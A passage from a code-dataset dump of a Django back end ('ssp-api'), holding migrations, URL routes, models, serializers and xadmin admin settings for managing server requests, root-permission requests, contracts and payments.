"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1986,
"license_type": "no_license",
"max_line_length": 532,
"num_lines": 41,
"path": "/apps/application/migrations/0015_auto_20170313_1715.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-03-13 17:15\nfrom __future__ import unicode_literals\n\nimport datetime\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('application', '0014_merge'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='order',\n name='lastModified',\n field=models.DateTimeField(default=datetime.datetime.now, verbose_name='\\u6700\\u540e\\u4fee\\u6539\\u65f6\\u95f4'),\n ),\n migrations.AddField(\n model_name='serverapplication',\n name='department',\n field=models.CharField(default='\\u7cfb\\u7edf\\u5ba4', max_length=200, verbose_name='\\u6240\\u5728\\u79d1\\u5ba4'),\n ),\n migrations.AddField(\n model_name='serverapplication',\n name='lastModified',\n field=models.DateTimeField(default=datetime.datetime.now, verbose_name='\\u6700\\u540e\\u4fee\\u6539\\u65f6\\u95f4'),\n ),\n migrations.AlterField(\n model_name='order',\n name='status',\n field=models.CharField(choices=[('\\u7533\\u8bf7\\u4e2d', '\\u7533\\u8bf7\\u4e2d'), ('\\u4f7f\\u7528\\u4e2d', '\\u4f7f\\u7528\\u4e2d'), ('\\u5df2\\u56de\\u6536', '\\u5df2\\u56de\\u6536')], default='\\u7533\\u8bf7\\u4e2d', max_length=20),\n ),\n migrations.AlterField(\n model_name='serverapplication',\n name='status',\n field=models.CharField(choices=[('\\u7533\\u8bf7\\u4e2d', '\\u7533\\u8bf7\\u4e2d'), ('\\u5ba1\\u6838\\u901a\\u8fc7-\\u5206\\u914d\\u4e2d', '\\u5ba1\\u6838\\u901a\\u8fc7-\\u5206\\u914d\\u4e2d'), ('\\u4f7f\\u7528\\u4e2d', '\\u4f7f\\u7528\\u4e2d'), ('\\u62d2\\u7edd', '\\u62d2\\u7edd'), ('\\u56de\\u6536\\u7533\\u8bf7\\u4e2d', '\\u56de\\u6536\\u7533\\u8bf7\\u4e2d'), ('\\u5ef6\\u671f\\u4e2d', '\\u5ef6\\u671f\\u4e2d'), ('\\u5df2\\u56de\\u6536', '\\u5df2\\u56de\\u6536'), ('\\u90e8\\u5206\\u56de\\u6536', '\\u90e8\\u5206\\u56de\\u6536')], default='\\u7533\\u8bf7\\u4e2d', max_length=20),\n ),\n ]\n"
},
{
"alpha_fraction": 0.7308781743049622,
"alphanum_fraction": 0.7381964325904846,
"avg_line_length": 63.181819915771484,
"blob_id": "6bbda23ab442b5a8366d641521481c7ff8538f4b",
"content_id": "4684b5b7eae43f0dd09fd4b94c10106fa1ddb765",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4236,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 66,
"path": "/SspApi/urls.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "\"\"\"SspApi URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. Import the include() function: from django.conf.urls import url, include\n 3. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf import settings\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nimport xadmin\nfrom users.views import LoginView\nfrom serverApplication.views import ApplicationListView, OsListView,EnvironmentView,SourceListView\nfrom application.views import ServerApplicationListView,UsingApplicationDetailView,UsingApplicationsListView\nfrom application.views import RootApplicationListView, RootApplicationDetailView,OrderListView\nfrom contractBudget.views import ProjectListView, ProjectDetailView,BudgetListView,BudgetDetailView,\\\n SupplierListView,SupplierDetailView,ContractListView,ContractDetailView,PaymentPlanListView\nfrom contractBudget.views import PaymentPlanDetailView,PaymentRecordListView,getContractByPaymentPlan,\\\n PaymentRecordDetailView,getContractByContractId,ContractPaymentListView\nurlpatterns = [\n url(r'^xadmin/', xadmin.site.urls),\n url(r'^login/$',LoginView.as_view(),name=\"login\"),\n url(r'^applications/$', ApplicationListView.as_view(), name='application'),\n url(r'^ueditor/',include('DjangoUeditor.urls' )),\n # url(r'^users/(?P<pk>[0-9]+)$',LoginView.as_view(),name=\"getUserByEmail\"),\n url(r'^users/(?P<email>[0-9a-zA-Z]+@(sysnew|Sysnew).com)',LoginView.as_view(),name=\"getUserByEmail\"),\n url(r'^rootapplications/$',RootApplicationListView.as_view(),name=\"rootApplicationList\"),\n url(r'^rootapplications/(?P<pk>[0-9]+)$',RootApplicationDetailView.as_view(),name=\"rootApplicationDetail\"),\n url(r'os/$',OsListView.as_view(),name=\"osListView\"),\n url(r'environments/$',EnvironmentView.as_view(),name=\"environmentListView\"),\n url(r'sources/$',SourceListView.as_view(),name=\"sourceListView\"),\n url(r'serverapplications/$',ServerApplicationListView.as_view(),name=\"serverApplicationListView\"),\n url(r'orders/$',OrderListView.as_view(),name=\"orderListView\"),\n url(r'usingresource/(?P<pk>[0-9]+)$',UsingApplicationDetailView.as_view(),name=\"serverapplicationDeatilView\"),\n url(r'usingresource/$',UsingApplicationsListView.as_view(),name=\"usingApplication\"),\n url(r'projects/$',ProjectListView.as_view(),name=\"projectListView\"),\n url(r'projects/(?P<pk>[0-9]+)$',ProjectDetailView.as_view(),name=\"projectDetailView\"),\n url(r'budgets/$',BudgetListView.as_view(),name=\"BudgetListView\"),\n url(r'budgets/(?P<pk>[0-9]+)$',BudgetDetailView.as_view(),name=\"BudgetDetailView\"),\n url(r'suppliers/$',SupplierListView.as_view(),name=\"SupplierListView\"),\n url(r'suppliers/(?P<pk>[0-9]+)$',SupplierDetailView.as_view(),name=\"SupplierDetailView\"),\n url(r'contracts/$',ContractListView.as_view(),name=\"ContractListView\"),\n url(r'contracts/(?P<pk>[0-9]+)$',ContractDetailView.as_view(),name=\"ContractDetailView\"),\n url(r'paymentplans/$',PaymentPlanListView.as_view(),name=\"PaymentListView\"),\n 
url(r'^paymentplans/(?P<pk>[0-9]+)$',PaymentPlanDetailView.as_view(),name=\"PaymentDetailView\"),\n url(r'^paymentrecords/$',PaymentRecordListView.as_view(),name=\"PaymentRecordListView\"),\n url(r'^pp/(?P<pk>[0-9]+)$',getContractByPaymentPlan),\n url(r'^paymentrecords/(?P<pk>[0-9]+)$',PaymentRecordDetailView.as_view(),name=\"PaymentRecordDetailView\"),\n url(r'^getContractByContractId/$',getContractByContractId),\n url(r'^contractPayments/$',ContractPaymentListView.as_view(),name=\"contractPaymentListview\"),\n url(r'^administrator/',include('administrator.urls',namespace=\"administrator\"))\n]\n# if settings.DEBUG:\n# import debug_toolbar\n# urlpatterns += [\n# url(r'^__debug__/', include(debug_toolbar.urls)),\n# ]\n"
},
{
"alpha_fraction": 0.6796390414237976,
"alphanum_fraction": 0.7010716199874878,
"avg_line_length": 37.565216064453125,
"blob_id": "8bf8cd403262f925e3921ae1b61bf47b7f3b972c",
"content_id": "611b1cc81ba33241e4a46bc699d166a678017baf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1905,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 46,
"path": "/apps/serverApplication/models.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- encoding:utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models\nfrom DjangoUeditor.models import UEditorField\n# Create your models here.\nclass Application(models.Model):\n ip = models.CharField(max_length=50,verbose_name=u\"IP地址\")\n username = models.CharField(max_length=20,verbose_name=u\"用户名\")\n user = models.CharField(max_length=10,verbose_name=u\"使用人\")\n team = models.CharField(max_length=50,verbose_name=u\"室/团队\")\n source = models.CharField(max_length=50,verbose_name=u\"来源\")\n environment = models.CharField(max_length=20,verbose_name=u\"环境类别\")\n os = models.CharField(max_length=10,verbose_name=u\"操作系统\")\n applyTime = models.CharField(max_length=100,verbose_name=u\"申请时间\")\n expireDate = models.CharField(max_length=100,verbose_name=u\"到期时间\")\n comment = UEditorField(verbose_name=u'备注',width=600, height=300, imagePath=\"editor/image\", filePath=\"editor/files\",default=\"\")\n lastModified = models.CharField(max_length=100)\n received = models.CharField(max_length=10, default='no',verbose_name=u\"是否已经回收\")\n\n\n class Meta:\n verbose_name = \"服务器申请信息\"\n verbose_name_plural = verbose_name\n ordering = ('applyTime',)\n\nclass Os(models.Model):\n type = models.CharField(max_length=20,verbose_name=u\"操作系统\",blank=False)\n\n class Meta:\n verbose_name = \"操作系统\"\n verbose_name_plural = verbose_name\n\nclass Environment(models.Model):\n name = models.CharField(max_length=30,verbose_name=u\"环境类别\",blank=False)\n\n class Meta:\n verbose_name = \"环境类别\"\n verbose_name_plural = verbose_name\n\nclass Source(models.Model):\n name = models.CharField(max_length=30,verbose_name=u\"来源\",blank=False)\n\n class Meta:\n verbose_name = \"项目来源\"\n verbose_name_plural = verbose_name"
},
{
"alpha_fraction": 0.5473145842552185,
"alphanum_fraction": 0.5959079265594482,
"avg_line_length": 19.578947067260742,
"blob_id": "d74025f8d7bcd1d9938bb8e982ed688009a452a6",
"content_id": "5d7c0e730eaabb6949e256342075905296b04aa1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 391,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 19,
"path": "/apps/application/migrations/0011_remove_serverapplication_appid.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-03-01 17:10\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('application', '0010_order'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='serverapplication',\n name='appId',\n ),\n ]\n"
},
{
"alpha_fraction": 0.5345167517662048,
"alphanum_fraction": 0.6094674468040466,
"avg_line_length": 24.350000381469727,
"blob_id": "934d60e76cdf409f1c075713d411eac68b987157",
"content_id": "bd29081be5d78b1bbd9fbc51472db9ca8fc47500",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 507,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 20,
"path": "/apps/users/migrations/0002_userprofile_team.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-02-14 22:06\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('users', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='userprofile',\n name='team',\n field=models.CharField(default='\\u7cfb\\u7edf\\u5ba4', max_length=50, verbose_name='\\u6240\\u5728\\u79d1\\u5ba4'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6733333468437195,
"alphanum_fraction": 0.6800000071525574,
"avg_line_length": 20.285715103149414,
"blob_id": "0cbb7d9783d37ed63c637b6da6a1e20ca6cd3319",
"content_id": "705626448219d3cf03206f8f69ca137f406ad570",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 158,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 7,
"path": "/apps/application/apps.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- encoding: utf-8 -*-\nfrom django.apps import AppConfig\n\n\nclass ApplicationConfig(AppConfig):\n name = 'application'\n verbose_name = \"用户申请\"\n\n"
},
{
"alpha_fraction": 0.6412087678909302,
"alphanum_fraction": 0.6478021740913391,
"avg_line_length": 39.46666717529297,
"blob_id": "f73094b3c612fe139aa25e80abe5bb2dc912ba00",
"content_id": "22b92f5eeb48c849b45761d568ec75dd67708411",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1820,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 45,
"path": "/apps/contractBudget/serializer.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/3/22 15:13'\n\nfrom rest_framework import serializers\nfrom .models import Project, Budget, Supplier, Contract, PaymentPlan,PaymentRecord\n\n\nclass ProjectSerizlizer(serializers.ModelSerializer):\n class Meta:\n model = Project\n fields = ('id', 'projectId', 'name', 'type', 'department', 'investment', 'maintain',\n 'development', 'total', 'status', 'comment', 'add_time', 'lastModified')\n\n\nclass BudgetSerializer(serializers.ModelSerializer):\n class Meta:\n model = Budget\n fields = ('id', 'project', 'year', 'investment', 'maintain', 'development', 'total')\n\n\nclass SupplierSerializer(serializers.ModelSerializer):\n class Meta:\n model = Supplier\n fields = ('id', 'supplierId', 'accountName', 'bankMaster', 'bankBranch', 'accountId', 'accountAddr',\n 'contact', 'phone', 'email', 'add_time')\n\n\nclass ContractSerializer(serializers.ModelSerializer):\n class Meta:\n model = Contract\n fields = ('id', 'contractId', 'lawId', 'project', 'status', 'supplierId', 'accountName',\n 'bankMaster', 'investment', 'maintain', 'development', 'total', 'signDate', 'subscriber',\n 'handlerPerson', 'comment','name')\n\nclass PaymentPlanSerializer(serializers.ModelSerializer):\n class Meta:\n model = PaymentPlan\n fields = ('id','contract','paymentTime','numOfPayments','ratioOfPayments','investment','maintain','development',\n 'total','items')\n\nclass PaymentRecordSerializer(serializers.ModelSerializer):\n class Meta:\n model = PaymentRecord\n fields = ('id','contractId','paymentPlanId','paymentPlanPk','numOfPayments','billNum','investment','maintain','development','total','billTime','processTime')"
},
{
"alpha_fraction": 0.6546090841293335,
"alphanum_fraction": 0.6686114072799683,
"avg_line_length": 33.2400016784668,
"blob_id": "db567da2cb29b0e6e1cb5fadf42578a1d68ff59c",
"content_id": "45f304087d857cab919857096be125e28499ea71",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 857,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 25,
"path": "/apps/application/serializers.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/2/15 10:22'\n\nfrom rest_framework import serializers\n\nfrom .models import RootApplication,ServerApplication,Order\n\nclass RootApplicationSerializer(serializers.ModelSerializer):\n class Meta:\n model = RootApplication\n fields = ('id','user','ip','reason','status','applyTime','deadline','email')\n\nclass ServerApplicationSerializer(serializers.ModelSerializer):\n class Meta:\n model = ServerApplication\n fields = ('id','user','username','ip','source','environment','os','deadline','reason','email','orderId','status'\n ,'applyTime','department','lastModified','cpu','memory','store')\n\n\n\nclass OrderSerializer(serializers.ModelSerializer):\n class Meta:\n model = Order\n fields = ('id','orderId','status','applyTime','lastModified')\n\n"
},
{
"alpha_fraction": 0.5852272510528564,
"alphanum_fraction": 0.6325757503509521,
"avg_line_length": 24.14285659790039,
"blob_id": "5eed198a30c9d159b48978babfc1bf2ae92ef050",
"content_id": "bc41fec6f684dda60dd6769e4a572ccb01a926ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 528,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 21,
"path": "/apps/serverApplication/migrations/0002_auto_20170211_1927.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-02-11 19:27\nfrom __future__ import unicode_literals\n\nimport DjangoUeditor.models\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('serverApplication', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='application',\n name='comment',\n field=DjangoUeditor.models.UEditorField(blank=True, default='', verbose_name='\\u5907\\u6ce8'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.49414390325546265,
"alphanum_fraction": 0.500278890132904,
"avg_line_length": 33.5,
"blob_id": "8181e54e7f6548150081df2760443a8268ac9e12",
"content_id": "32ac3b20ec4fa18b3426ff9619591d27bef57daf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1829,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 52,
"path": "/apps/users/adminx.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/2/9 12:13'\nimport xadmin\nfrom xadmin.plugins.auth import UserAdmin\nfrom .models import UserProfile\nfrom xadmin import views\nfrom django.contrib.auth.models import User\nfrom xadmin.layout import Fieldset, Main, Side, Row, FormHelper\nfrom django.utils.translation import ugettext as _\nclass UserProfileAdmin(UserAdmin):\n def get_form_layout(self):\n if self.org_obj:\n self.form_layout = (\n Main(\n Fieldset('',\n 'username', 'password',\n css_class='unsort no_title'\n ),\n Fieldset(_('Personal info'),\n Row('first_name', 'last_name'),\n 'email'\n ),\n Fieldset(_('Permissions'),\n 'groups', 'user_permissions'\n ),\n Fieldset(_('Important dates'),\n 'last_login', 'date_joined'\n ),\n ),\n Side(\n Fieldset(_('Status'),\n 'is_active', 'is_staff', 'is_superuser',\n ),\n )\n )\n return super(UserAdmin, self).get_form_layout()\n\nclass BaseSetting(object):\n enable_themes = True\n use_bootswatch = True\n\n\nclass GlobalSettings(object):\n site_title = \"中国银联系统服务平台管理系统\"\n site_footer = \"中国银联\"\n menu_style = \"accordion\"\n\n# xadmin.site.unregister(User)\n# xadmin.site.register(UserProfile,UserProfileAdmin)\nxadmin.site.register(views.BaseAdminView,BaseSetting)\nxadmin.site.register(views.CommAdminView,GlobalSettings)"
},
{
"alpha_fraction": 0.535251796245575,
"alphanum_fraction": 0.6000000238418579,
"avg_line_length": 26.799999237060547,
"blob_id": "bd863603b0e1d45245a30d480f77ea9b30c367d1",
"content_id": "5c0118065e4a655c06dadc6df6c95fbd13e3c968",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 695,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 25,
"path": "/apps/application/migrations/0009_auto_20170228_1831.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-02-28 18:31\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('application', '0008_auto_20170228_1500'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='serverapplication',\n name='email',\n field=models.CharField(max_length=100, verbose_name='\\u8054\\u7cfb\\u90ae\\u7bb1'),\n ),\n migrations.AlterField(\n model_name='serverapplication',\n name='ip',\n field=models.CharField(blank=True, max_length=20, verbose_name='IP'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6510319113731384,
"alphanum_fraction": 0.6547842621803284,
"avg_line_length": 21.25,
"blob_id": "455e16fe780d45a00d47c7223b97173a3d6a44ba",
"content_id": "fd8ac66d533de7e9e25060ec97c23a400e013002",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 533,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 24,
"path": "/functionTests/test.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "import multiprocessing\nimport time\n\ndef first():\n print(\"there is no problem here\")\n\ndef second():\n raise RuntimeError(\"Error Raised\")\n\ndef third():\n time.sleep(3)\n print(\"This process will be terminated\")\n\nworkers = [multiprocessing.Process(target=first),multiprocessing.Process(target=second),multiprocessing.Process(target=third)]\n\nif __name__ == '__main__':\n \n for w in workers:\n w.start()\n workers[-1].terminate()\n for w in workers:\n w.join()\n for w in workers:\n print(w.exitcode)"
},
{
"alpha_fraction": 0.6271272301673889,
"alphanum_fraction": 0.654813289642334,
"avg_line_length": 50.78947448730469,
"blob_id": "5759b3cb073f5d9204d8e1eedeb1af4a4c6bda5a",
"content_id": "76645b2e2f4dd2ebb4b00fa37e3a0d4c4373a659",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4423,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 76,
"path": "/apps/application/models.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- encoding:utf-8 -*-\n\nfrom __future__ import unicode_literals\nfrom datetime import datetime\nfrom django.db import models\nfrom django.db.models import Q\n# Create your models here.\n\n#root权限申请\nclass RootApplication(models.Model):\n user = models.CharField(max_length=50,verbose_name=\"申请人\",blank=False)\n ip = models.CharField(max_length=50,verbose_name=\"申请ip\",blank=False)\n reason = models.CharField(max_length=500,verbose_name=\"申请原因\",default=\"\",blank=True)\n status = models.CharField(choices=(('申请中',\"申请中\"),(\"使用中\",\"使用中\"),(\"已到期\",\"已到期\"),(\"已回收\",\"已回收\")),default=\"申请中\",\n max_length=20,verbose_name=\"申请状态\")\n applyTime = models.DateTimeField(default=datetime.now,verbose_name=\"申请时间\")\n deadline = models.DateTimeField(blank=False,verbose_name=\"截止日期\")\n email = models.EmailField(max_length=100,blank=False,verbose_name=\"联系邮箱\")\n\n class Meta:\n verbose_name = \"root权限申请\"\n verbose_name_plural = verbose_name\n\n def setExpiredApplication(self):\n today = datetime.now().strftime(\"%Y-%m-%d\")\n applications = RootApplication.objects.all().filter(Q(deadline__lte=today),Q(status=\"使用中\"))\n for application in applications:\n application.status = \"已到期\"\n application.save()\n def getExpiredApplication(self):\n return RootApplication.objects.all().filter(status=\"已到期\")\n\n\n# 服务器环境申请\n\nclass ServerApplication(models.Model):\n user = models.CharField(max_length=20,verbose_name=\"使用人\",blank=False)\n username = models.CharField(max_length=200,verbose_name=\"用户名\",blank=False)\n ip = models.CharField(max_length=20,verbose_name=\"IP\",blank=True)\n source = models.CharField(max_length=50,verbose_name=\"来源\",blank=False)\n environment = models.CharField(max_length=50,verbose_name=\"环境类别\",blank=False)\n os = models.CharField(max_length=20,verbose_name=\"操作系统\",blank=False)\n deadline = models.DateTimeField(blank=False,verbose_name=\"截止日期\")\n reason = models.CharField(max_length=500,verbose_name=\"申请原因\",blank=False)\n email = models.CharField(max_length=100,verbose_name=\"联系邮箱\",blank=False)\n orderId = models.CharField(max_length=200,verbose_name=\"订单id\",blank=False)\n department = models.CharField(max_length=200,verbose_name=\"所在科室\",default=\"系统室\")\n status = models.CharField(choices=(('申请中','申请中'),('审核通过-分配中','审核通过-分配中'),\n (\"使用中\",\"使用中\"),(\"拒绝\",\"拒绝\"),(\"申请回收中\",\"申请回收中\"),(\"延期中\",\"延期中\"),\n (\"申请延期中\",\"申请延期中\"),(\"已到期\",\"已到期\")\n ,(\"已回收\",\"已回收\"),(\"部分回收\",\"部分回收\")),default=\"申请中\",max_length=20)\n applyTime = models.DateTimeField(default=datetime.now, verbose_name=\"申请时间\")\n lastModified = models.DateTimeField(default=datetime.now,verbose_name=\"最后修改时间\")\n\n cpu = models.CharField(choices=(('1C','1C'),('2C','2C'),('4C','4C'),('8C','8C'),('16C','16C'),('32C','32C')),default=\"1C\",max_length=10)\n memory = models.CharField(choices=((\"2G\",\"2G\"),(\"4G\",\"4G\"),(\"8G\",\"8G\"),(\"16G\",\"16G\"),(\"32G\",\"32G\"),(\"64G\",\"64G\")),default=\"2G\",max_length=10)\n store = models.CharField(choices=((\"20G\",\"20G\"),(\"40G\",\"40G\"),(\"100G\",\"100G\")),default=\"20G\",max_length=10)\n\n class Meta:\n verbose_name = \"服务器申请\"\n verbose_name_plural = verbose_name\n\n def getExpiredApplication(self):\n return ServerApplication.objects.all().filter(status=\"已到期\")\n\n\nclass Order(models.Model):\n orderId = models.CharField(max_length=200,blank=False)\n user = models.CharField(max_length=200,blank=False)\n email = models.EmailField(max_length=200,blank=True)\n applyTime = models.DateTimeField(default=datetime.now,verbose_name=\"申请时间\")\n 
status = models.CharField(choices=(('申请中', '申请中'),('使用中','使用中'),(\"已回收\", \"已回收\")), default=\"申请中\", max_length=20)\n lastModified = models.DateTimeField(default=datetime.now,verbose_name=\"最后修改时间\")\n class Meta:\n verbose_name = \"订单\"\n verbose_name_plural = verbose_name\n\n"
},
{
"alpha_fraction": 0.6230303049087524,
"alphanum_fraction": 0.6375757455825806,
"avg_line_length": 29.518518447875977,
"blob_id": "7b3f5af4944c9ca3c270836be84683d99f3644ad",
"content_id": "f42954bea6b8772a67dc3bf51a563ed8ddb1e9ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 825,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 27,
"path": "/apps/serverApplication/serializer.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/2/10 16:21'\nfrom rest_framework import serializers\nfrom .models import Application, Os, Environment, Source\nclass ApplicationSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Application\n fields = ('id', 'ip', 'username', 'user', 'team', 'source', 'environment',\n 'os', 'applyTime', 'expireDate', 'comment', 'lastModified', 'received')\n\n\nclass OsSerializer(serializers.ModelSerializer):\n class Meta:\n model = Os\n fields = ('id','type')\n\nclass EnvironmentSerializer(serializers.ModelSerializer):\n class Meta:\n model = Environment\n fields = ('id','name')\n\nclass SourceSerializer(serializers.ModelSerializer):\n class Meta:\n model = Source\n fields = ('id','name')\n\n"
},
{
"alpha_fraction": 0.6303656697273254,
"alphanum_fraction": 0.6399046182632446,
"avg_line_length": 36.02941131591797,
"blob_id": "fcf838830d0c4b0f09862f3a9263ce49b091a9ca",
"content_id": "3a73d54cfc433c1fe5f6dd241d5aae34953757a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1258,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 34,
"path": "/apps/serverApplication/adminx.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/2/10 15:41'\nfrom .models import Application, Os,Environment,Source\nimport xadmin\nclass ApplicationAdmin(object):\n list_display = ['ip', 'username', 'user', 'team','source','environment','os','applyTime','expireDate','comment',\n 'lastModified','received']\n search_fields = ['ip', 'username', 'user', 'team','source','environment','os','applyTime','expireDate','comment',\n 'received']\n list_filter = ['ip', 'username', 'user', 'team','source','environment','os','applyTime','expireDate','comment',\n 'lastModified','received']\n model_icon = 'fa fa-info'\n style_fields = {\"comment\":\"ueditor\"}\n import_excel = True\nclass OsAdmin(object):\n list_display = ['type']\n search_fields = ['type']\n list_filter = ['type']\n\nclass EnvironmentAdmin(object):\n list_display = ['name']\n search_fields = ['name']\n list_filter = ['name']\n\nclass SourceAdmin(object):\n list_display = ['name']\n search_fields = ['name']\n list_filter = ['name']\n\nxadmin.site.register(Application,ApplicationAdmin)\nxadmin.site.register(Os,OsAdmin)\nxadmin.site.register(Environment,EnvironmentAdmin)\nxadmin.site.register(Source,SourceAdmin)"
},
{
"alpha_fraction": 0.5602968335151672,
"alphanum_fraction": 0.6289424896240234,
"avg_line_length": 25.950000762939453,
"blob_id": "c65dda131b4df48a37fc97f010ef8e9cef86f628",
"content_id": "89c1c2979f99184a34ffdff20bd3d2b85f573c05",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 539,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 20,
"path": "/apps/contractBudget/migrations/0009_paymentrecord_paymentplanid.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-04-01 11:07\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('contractBudget', '0008_paymentrecord'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='paymentrecord',\n name='paymentPlanId',\n field=models.CharField(blank=True, default='', max_length=50, verbose_name='\\u4ed8\\u6b3e\\u8ba1\\u5212\\u7f16\\u53f7'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.44243985414505005,
"alphanum_fraction": 0.6348797082901001,
"avg_line_length": 45.560001373291016,
"blob_id": "3ca83092a7aa6fecde0e6b39ac78de01b4a6161f",
"content_id": "0e04425decc25cda44daf1f71eb05e77749befe1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1164,
"license_type": "no_license",
"max_line_length": 544,
"num_lines": 25,
"path": "/apps/application/migrations/0008_auto_20170228_1500.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
